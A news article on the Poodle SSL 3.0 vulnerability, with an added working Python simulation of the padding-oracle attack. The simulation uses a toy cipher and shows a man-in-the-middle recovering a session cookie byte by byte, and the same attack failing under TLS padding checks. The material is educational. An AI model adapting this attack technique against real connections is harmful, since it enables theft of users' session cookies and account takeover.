If the ominous-sounding Heartbleed and Shellshock were named for the size of the threat they posed to Web users, then the researchers who discovered “Poodle” could hardly have picked a more fitting name. The vulnerability is a real concern, but researchers have made clear it is nowhere near as serious as those two earlier bugs.
Short for “Padding Oracle On Downgraded Legacy Encryption,” Poodle lets an attacker who can intercept and alter traffic between a browser and a website first push the connection down to the old SSL 3.0 protocol and then decrypt pieces of the data SSL is supposed to protect, such as the session cookie that keeps a user logged in. It does not defeat SSL certificates, which are what confirm for customers that a website like Amazon is actually Amazon rather than a fake hoping to steal their credit card information; the attack works on the encrypted data exchanged after that check, one byte at a time.
The Poodle bug was first revealed in an advisory report from Google’s security team published Tuesday. The experts explained that the bug affects only SSL 3.0, which they called “an obsolete and insecure protocol,” and recommended that Web developers disable SSL 3.0 immediately to “completely avoid” any risk Poodle presents.
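To make the “padding oracle” concrete, here is an added simulation of the record manipulation behind Poodle. It is not code from the article, from Google’s advisory or from any SSL library. It assumes a toy 16-byte Feistel block cipher in place of AES or 3DES, HMAC-SHA256 in place of the SSL 3.0 MAC, a fresh random IV per record in place of SSL 3.0’s chained IV, and a constructed cookie value and HTTP request layout; the server-side check mirrors the SSL 3.0 rule (only the final pad-length byte is examined) beside the TLS 1.0+ rule (every padding byte is checked), which is why the same trick fails against TLS.

```python
# Added example: a self-contained POODLE simulation. Not code from the article
# or from Google's advisory. Toy Feistel cipher, HMAC-SHA256 MAC, random IVs,
# cookie value and request layout are all constructed for the demo.
import hashlib
import hmac
import random

BLOCK, MAC_LEN = 16, 20
_rng = random.Random(2014)              # seeded so the demo is reproducible
KEY, MAC_KEY = b"toy-cipher-key", b"toy-mac-key"   # constructed demo keys
SECRET = b"SESSIONID=7f3a9c0e1b"        # constructed cookie the attacker wants

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(i, half):                         # Feistel round function (toy, not AES)
    return hashlib.sha256(KEY + bytes([i]) + half).digest()[:8]

def enc_block(b):
    l, r = b[:8], b[8:]
    for i in range(4):
        l, r = r, xor(l, _f(i, r))
    return l + r

def dec_block(b):
    l, r = b[:8], b[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(i, l)), l
    return l + r

def cbc_encrypt(iv, pt):
    out, prev = b"", iv
    for j in range(0, len(pt), BLOCK):
        prev = enc_block(xor(pt[j:j + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(iv, ct):
    out, prev = b"", iv
    for j in range(0, len(ct), BLOCK):
        out += xor(dec_block(ct[j:j + BLOCK]), prev)
        prev = ct[j:j + BLOCK]
    return out

def mac(data):
    return hmac.new(MAC_KEY, data, hashlib.sha256).digest()[:MAC_LEN]

# --- victim's browser: encrypts whatever request the attacker's page triggers.
def browser_send(path_len, body_len):
    """One SSL 3.0 record: data || MAC || padding. The attacker's script
    controls only path_len and body_len, never the cookie."""
    data = (b"POST /" + b"a" * path_len + b" HTTP/1.1\r\nCookie: " + SECRET
            + b"\r\n\r\n" + b"b" * body_len)
    n = (BLOCK - 1 - (len(data) + MAC_LEN)) % BLOCK   # SSL 3.0 minimal padding
    pad = bytes(_rng.randrange(256) for _ in range(n)) + bytes([n])  # pad bytes arbitrary
    iv = bytes(_rng.randrange(256) for _ in range(BLOCK))
    return iv, cbc_encrypt(iv, data + mac(data) + pad)

# --- server: SSL 3.0 checks only the length byte; TLS 1.0+ checks every pad byte.
def server_accepts(iv, ct, strict_padding=False):
    pt = cbc_decrypt(iv, ct)
    n = pt[-1]
    if n >= BLOCK or len(pt) < n + 1 + MAC_LEN:
        return False
    if strict_padding and any(b != n for b in pt[-(n + 1):-1]):
        return False                     # TLS rule: closes the oracle
    body = pt[:len(pt) - n - 1]
    return hmac.compare_digest(mac(body[:-MAC_LEN]), body[-MAC_LEN:])

# --- attacker: man-in-the-middle who replays each record with one block swapped.
HEAD = len(b"POST /") + len(b" HTTP/1.1\r\nCookie: ")
TAIL = len(b"\r\n\r\n")

def recover_byte(k, strict_padding=False, max_tries=100_000):
    """Recover SECRET[k]: steer it to the last byte of some block C_i, then
    replace the record's padding block with C_i and watch whether the server
    accepts. Acceptance means D(C_i)[15] ^ C_{last-1}[15] == 15."""
    path_len = (BLOCK - 1 - (HEAD + k)) % BLOCK            # byte k lands at offset 15
    body_len = (-(HEAD + path_len + len(SECRET) + TAIL + MAC_LEN)) % BLOCK  # full pad block
    i = (HEAD + path_len + k) // BLOCK                     # block holding the target byte
    for _ in range(max_tries):
        iv, ct = browser_send(path_len, body_len)
        blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
        forged = b"".join(blocks[1:-1]) + blocks[i + 1]    # C_i replaces the padding block
        if server_accepts(iv, forged, strict_padding):
            return blocks[-2][-1] ^ blocks[i][-1] ^ (BLOCK - 1)
    return None                                            # oracle never fired

def recover_cookie(strict_padding=False):
    out = bytearray()
    for k in range(len(SECRET)):         # assumption: cookie length already known
        b = recover_byte(k, strict_padding)
        if b is None:
            return None
        out.append(b)
    return bytes(out)

if __name__ == "__main__":
    print("SSL 3.0 padding check:", recover_cookie())
    print("TLS padding check    :", recover_byte(0, strict_padding=True, max_tries=3000))
```

Run it directly and the SSL 3.0 path prints the full cookie, each byte costing about 256 replayed requests on average, while the TLS-style check never accepts a forged record because all fifteen pad bytes would have to decrypt to the right value at once. That per-byte cost is why the attack is practical against secrets a browser resends on every request, such as cookies, and not against arbitrary data.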
While SSL 3.0 was superseded by TLS some 15 years ago, the researchers noted that users who still browse the Internet with Microsoft Internet Explorer 6 could be at risk. Many servers still support SSL 3.0 for fear of locking such users out. Google said it has already added support for TLS_FALLBACK_SCSV, a mechanism that stops an attacker from forcing a connection down to an older protocol, to Chrome and to its own servers, and that it intends to remove SSL 3.0 support from its products altogether.
“The problem with the obvious solution is that our aging Internet infrastructure is still loaded with crappy browsers, and servers that can’t function without SSLv3 support,” a cryptographer and research professor at Johns Hopkins University wrote on his security blog. “Browser vendors don’t want their customers to hit a blank wall anytime they access a server or load balancer that only supports SSLv3, so they enable fallback.”